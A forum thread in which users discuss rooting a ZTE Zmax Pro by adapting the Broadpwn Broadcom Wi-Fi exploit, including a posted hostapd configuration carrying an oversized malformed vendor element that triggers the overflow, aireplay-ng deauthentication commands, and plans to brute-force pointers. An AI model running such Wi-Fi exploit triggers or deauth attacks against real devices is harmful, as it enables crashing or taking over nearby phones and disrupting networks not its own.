Root ZTE Zmax Pro Official Root Discussion

[SapphireEx]

haha I love the packet clone sploit on the 3DS.

I mean a lot of trial and error but searching for pointers shouldn't be impossible. Theres no ASLR.

If we have the instant reset failsafe in the chip, it's a completely dead end. If we don't, we can bruteforce the pointers directly with a modified aircrack script to automate beacon creation, then sending deauth packets to the phone after the exploit is triggered.

I'm not well versed in bash/python scripting, so this job would probably be better suited to someone else, but I have the hardware and software to test it (daily driver is Kali, with 3 different promiscuous enabled NICs I can use)

 

[messi2050]

I still feeling sorry for such a good device with a locked bootloader.. even the new lg stylo 3 plus got root today -_-

 

[TheOneReaperAndroid]

I still feeling sorry for such a good device with a locked bootloader.. even the new lg stylo 3 plus got root today -_-

  

   Didn't the Stylo 3 Plus just come out recently so root is allowed on that phone but not this one fml. ☹🙁😞😖😟

 

[messi2050]

  

   Didn't the Stylo 3 Plus just come out recently so root is allowed on that phone but not this one fml. ☹🙁😞😖😟

Stylo 3 plus have unlocked bootloader which allows flashing unsigned images.

 

[GarnetSunset]

i

It will take years probably

What divine wisdom is this.

If we have the instant reset failsafe in the chip, it's a completely dead end. If we don't, we can bruteforce the pointers directly with a modified aircrack script to automate beacon creation, then sending deauth packets to the phone after the exploit is triggered.

I'm not well versed in bash/python scripting, so this job would probably be better suited to someone else, but I have the hardware and software to test it (daily driver is Kali, with 3 different promiscuous enabled NICs I can use)

I write python scripts for fun. I might be up to the challenge, gimme a lil bit to sort out stuff. (I'm on windows using bash on windows, I know, disgusting)

 

[armandop_]

Hey messi2050, what program are you using to use the firehose file? miflash? Or qfil?

 

[messi2050]

Hey messi2050, what program are you using to use the firehose file? miflash? Or qfil?

Miflash

 

[SapphireEx]

What divine wisdom is this.


I write python scripts for fun. I might be up to the challenge, gimme a lil bit to sort out stuff. (I'm on windows using bash on windows, I know, disgusting)

It shouldn't be too complex. Plug and play would be easier with just "aireplay-ng 0 -1 -a <BSSID> -c <Phone BSSID>" instead of manually searching for the BSSID with the script. Beacon automation will be the hard part though. Might need to use a climbing int raise variable and force feed it into the next script with a n+1 scale or so.

 

[GarnetSunset]

It shouldn't be too complex. Plug and play would be easier with just "aireplay-ng 0 -1 -a <BSSID> -c <Phone BSSID>" instead of manually searching for the BSSID with the script. Beacon automation will be the hard part though. Might need to use a climbing int raise variable and force feed it into the next script with a n+1 scale or so.

With python a file could be created with an int stored in it, to force feed it into the next section of the beacon, read the int, int++ it, move on, right?

 

[SapphireEx]

With python a file could be created with an int stored in it, to force feed it into the next section of the beacon, read the int, int++ it, move on, right?

Should be able to. You would need to add a wait condition for the deauth to actually go through though.

 

[GarnetSunset]

Should be able to. You would need to add a wait condition for the deauth to actually go through though.

Can python even catch that? Eh, worth trying anyway.

 

[loonycgb2]

Should be able to. You would need to add a wait condition for the deauth to actually go through though.

Can python even catch that? Eh, worth trying anyway.

Why use python if perl is available?

Python is for more on system type stuff, but network type attacks perl js best.

Are you guys planning to run it on Android or off a host machine?

 

[JIMMYHENDRIX]

Do you need root to undervlot Cpu on Android

 

[Nyrixa]

"run the CMD with admistrator privileges and use the following commands -

adb devices

[hit enter]

adb reboot disemmcwp

[Your device will now reboot with some extra write permissions]"

Just came across this while looking for information on another phone, would the reboot disemmcwp work in our situation?

 

[loonycgb2]

Do you need root to undervlot Cpu on Android

Yes undervolting needs root as it is a root task during boot.

"run the CMD with admistrator privileges and use the following commands -

adb devices

[hit enter]

adb reboot disemmcwp

[Your device will now reboot with some extra write permissions]"

Just came across this while looking for information on another phone, would the reboot disemmcwp work in our situation?

That command has been locked to root via ftm mode so unless you have root suid it won't work.

 

[GarnetSunset]

Why use python if perl is available?

Python is for more on system type stuff, but network type attacks perl js best.

Are you guys planning to run it on Android or off a host machine?

Honestly the reason I wasn't planning on using perl was because I don't know the language, but, if someone wants to beat me to the punch (It'll be a while, gotta finish transitioning to my new home) go for it. I'll devote my hobby time to writing that script if so.

 

[SapphireEx]

Can python even catch that? Eh, worth trying anyway.

You could do it the lazy way with just a time out of like 10 seconds, but it'd slow down the entire bruteforce. Ruby would work well for this as well, but the only thing I know about using Ruby is how to install things with it really.
I mainly use VB with C++/C#, but they really aren't suited for a linux environment.
The main languages we could use would be:

Basic bash scripting
Ruby
Python
Perl
C++ if we can interface Aircrack-ng with it
ASM (I'm not doing it in ASM. Even debugging is a pain in the ass)

So if anyone knows any of these languages, and have a linux environment set up for ath9k or any other prom NIC drivers, with the aircrack suite installed, we can get moving on the broadcom exploit.

 

[SapphireEx]

#!/bin/bash

#This script requires Hostapd
# WiFi Hotspot
interface=wlan0mon
driver=ath9k
#Access Point
ssid=BroadPwn
hw_mode=g
# WiFi Channel:
channel=1
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0

assocresp_elements=ddff0050f2020101000003a4000027a4000042435e0062322f00414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
vendor_elements=ddff0050f2020101000003a4000027a4000042435e0062322f00414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141


# -------- Deauth in case it is needed --------
# Input your APs BSSID after -a, and the phone BSSID after -c
#aireplay-ng -0 1 -a FF:FF:FF:FF:FF:FF -c AA:AA:AA:AA:AA:AA wlan0mon
#sleep 3
# -------- Deauth in case it is needed --------

Here's a script I found (And modified for my own use) that can trigger the exploit using hostapd. Give it a go if you're feeling lucky.

 

[SapphireEx]

I know a little bash and some perl.. like old html cgi script stuff... lol.
I've used aircrack a loonngg time ago to test out my neighbor's wifi security
I have Ubuntu on my laptop (fail... lol).

If i had some time to find all these things i could download them with my hotspot and give it a shot. What exactly do i need?

For just testing the exploit as is, just hostapd.

For finding address pointers, a beacon creation system, and a lot of time

 

[GarnetSunset]

You could do it the lazy way with just a time out of like 10 seconds, but it'd slow down the entire bruteforce. Ruby would work well for this as well, but the only thing I know about using Ruby is how to install things with it really.
I mainly use VB with C++/C#, but they really aren't suited for a linux environment.
The main languages we could use would be:

Basic bash scripting
Ruby
Python
Perl
C++ if we can interface Aircrack-ng with it
ASM (I'm not doing it in ASM. Even debugging is a pain in the ass)

So if anyone knows any of these languages, and have a linux environment set up for ath9k or any other prom NIC drivers, with the aircrack suite installed, we can get moving on the broadcom exploit.

Hey, thanks for the heads up, I'mma give it some juice.

 

[SapphireEx]

Hey, thanks for the heads up, I'mma give it some juice.

Any news?

 

[jdoggthemaster4089]

I went through with a hard crack exploit and definitely cracked something on this phone...

 

[jdoggthemaster4089]

Any news?

 

[jdoggthemaster4089]

Any news?

&#129303;

 

[SapphireEx]

I went through with a hard crack exploit and definitely cracked something on this phone...

Care to elaborate?